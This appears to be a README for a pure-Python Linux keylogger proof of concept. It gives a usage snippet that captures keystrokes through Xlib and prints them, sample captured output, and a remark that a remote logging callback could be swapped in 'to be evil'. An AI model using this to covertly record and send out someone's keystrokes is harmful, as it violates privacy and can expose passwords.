PyKeylogger is a proof of concept of a pure-python keylogger for linux. It uses Xlib (so you must have an X connection!) to monitor the state of the keyboard. Here's how you use it:
import keylogger import time now = time.time() done = lambda: time.time() > now + 60 def print_keys(t, modifiers, keys): print "%.2f %r %r" % (t, keys, modifiers) keylogger.log(done, print_keys)
This will print key events to stdout for 60 seconds. If you wanted to be evil, instead of passing in a print callback, you could pass in a remote logging precedure.
Sample output:
1314238675.42 'o' {'left shift': False, 'right alt': False, 'right shift': False, 'left alt': False, 'left ctrl': False, 'right ctrl': False}
1314238675.51 'm' {'left shift': False, 'right alt': False, 'right shift': False, 'left alt': False, 'left ctrl': False, 'right ctrl': False}
1314238675.65 'g' {'left shift': False, 'right alt': False, 'right shift': False, 'left alt': False, 'left ctrl': False, 'right ctrl': False}